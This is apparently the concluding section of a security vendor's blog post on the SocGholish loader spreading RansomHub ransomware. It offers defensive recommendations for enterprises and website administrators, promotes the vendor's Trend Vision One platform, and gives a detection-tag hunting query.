The Tactics of SocGholish’s Invasion Help in Spreading RansomHub Ransomware
Recommendations for Safety
In order to deal with SocGholish infections as significant incidents, security and response teams should promptly take action and implement response procedures to quickly lessen the impact of its malicious deeds, such as deploying backdoors, gaining unauthorized access to sensitive data, moving laterally within the system, extracting data, and causing destruction through ransomware. Defenders should also adhere to the following recommended practices:
- Utilizing extended detection and response (XDR) solutions to promptly recognize, disrupt, and connect malevolent actions similar to those employed in SocGholish attacks
- Decreasing the vulnerability to script-based malware like SocGholish by:
- Strengthening endpoints and servers by blocking suspicious Windows Scripting Host (wscript.exe) and PowerShell executions through policy-based controls such as group policy objects
- Customers of Trend Vision One can activate “Attack Surface Reduction” by ensuring “Behavior Monitoring and Predictive Machine Learning” are enabled in Endpoint and Server Policies
- Enabling logging of anti-malware scan interface events to aid in investigations
- Customers of Trend Vision One can probe “TELEMETRY_AMSI_EXECUTE” events to reconstruct script executions for incident response operations
- Implementing web reputation services (WRS) on endpoints, cloud workloads, and proxy servers to identify and intercept malicious and abnormal traffic
- Utilizing network intrusion detection and prevention solutions, along with network detection and response (NDR), to attain insight into network traffic
- Phasing out or substantially fortifying, segmenting, or isolating outdated operating systems, since these are prime targets for adversaries through reconnaissance and lateral movement strategies
For their part, owners and administrators of websites should understand that vulnerable Content Management Systems (CMS) and their plugin systems are frequently the targets of threat actors. This is because they provide an avenue for cybercriminals to exploit websites to redirect visitor traffic, much like SocGholish, and spread malware.
Compromised websites can profoundly affect a business’ operations if their sites are flagged as malicious by security solutions and web browser block lists. Website administrators can mitigate this by:
- Keeping an eye on security alerts for Content Management Systems and applying fixes and/or patches for vulnerabilities
- Staying informed about security alerts for content management system plugins and applying fixes and/or patches for vulnerabilities that are exploited for initial access to web servers
- Deploying a web application firewall to sift through exploit traffic
- Restricting entrance to administrative portals
- Employing multi-factor authentication (MFA) and intricate passwords for administrative panels
- Using SSH keys for administrative interfaces and refraining from exposing administration interfaces like web host management interfaces, control panels, and SSH interfaces to the web
- Isolating and reconstructing compromised web servers to eliminate threat actors post-compromise
Being Proactive with Trend Vision One™
Trend Vision One™ is an enterprise cybersecurity platform that streamlines security and aids enterprises in spotting and halting threats swiftly by consolidating various security capabilities, providing a greater grip on the enterprise’s attack surface, and offering a complete view of its cyber risk position. This cloud-centered platform utilizes artificial intelligence and threat intelligence from 250 million sensors and 16 threat research centers globally to furnish comprehensive risk insights, early threat detection, and automated risk and threat response options in a unified solution.
As mentioned previously, Trend Vision One customers can lessen their exposure to potential attacks by ensuring that “Behavior Monitoring and Predictive Machine Learning” are enabled in Endpoint and Server Policies.
Threat Intelligence with Trend Vision One
To stay ahead of evolving threats, Trend Vision One customers can access various Intelligence Reports and Threat Insights within Vision One. Threat Insights aids customers in preparing for upcoming threats by providing thorough information about threat actors, their malevolent activities, and their tactics. By leveraging this intelligence, customers can take proactive measures to defend their environments, mitigate risks, and effectively counter threats.
The Trend Vision One Intelligence Reports App [IOC Sweeping]
- [AIM/MDR/IR][Spot Report] Ghoulish Tactics: Unmasking the SocGholish to Ransomhub Attack Chain
The Trend Vision One Threat Insights App
Hunting Quizzes
The Trend Vision One Search App
Customers of Trend Vision One can utilize the Search App to locate or hunt for the malicious indicators referred to in this blog post within their environment.
Finding the initial dropper:
tags: (“XSAE.F11697” OR “XSAE.F11689” OR “XSAE. F8637” OR “XSAE. F8636” OR “XSAE. F7176”)
Additional hunting queries are accessible for Trend Vision One customers with Threat Insights Entitlement enabled.
In Summary
SocGholish is a prevalent and elusive threat. The utilization of strong obfuscation in the loader presents a hurdle for static file detection technologies. The fileless execution of commands may pose difficulties for specific detection technologies.
Due to the widespread number of compromised websites leading to SocGholish, combined with the adoption of a commercial TDS for sandbox and crawler evasion and the incorporation of Anti-Sandbox measures, detection solutions like sandboxes might face challenges, potentially allowing SocGholish to operate in environments, leading to impactful attacks.
Its collaboration with well-known and dangerous RaaS operations like RansomHub implies that SocGholish is a significant threat to enterprises. Nevertheless, there are numerous detection opportunities, from suspicious execution with dubious process chains that execute discovery, lateral movement, credential access, and data exfiltration, to outbound connections to low-reputation infrastructure, and peculiar internal connections from compromised hosts.
Indicators of Compromise (IOCs)
Grab the list of IOCs here.
About Author
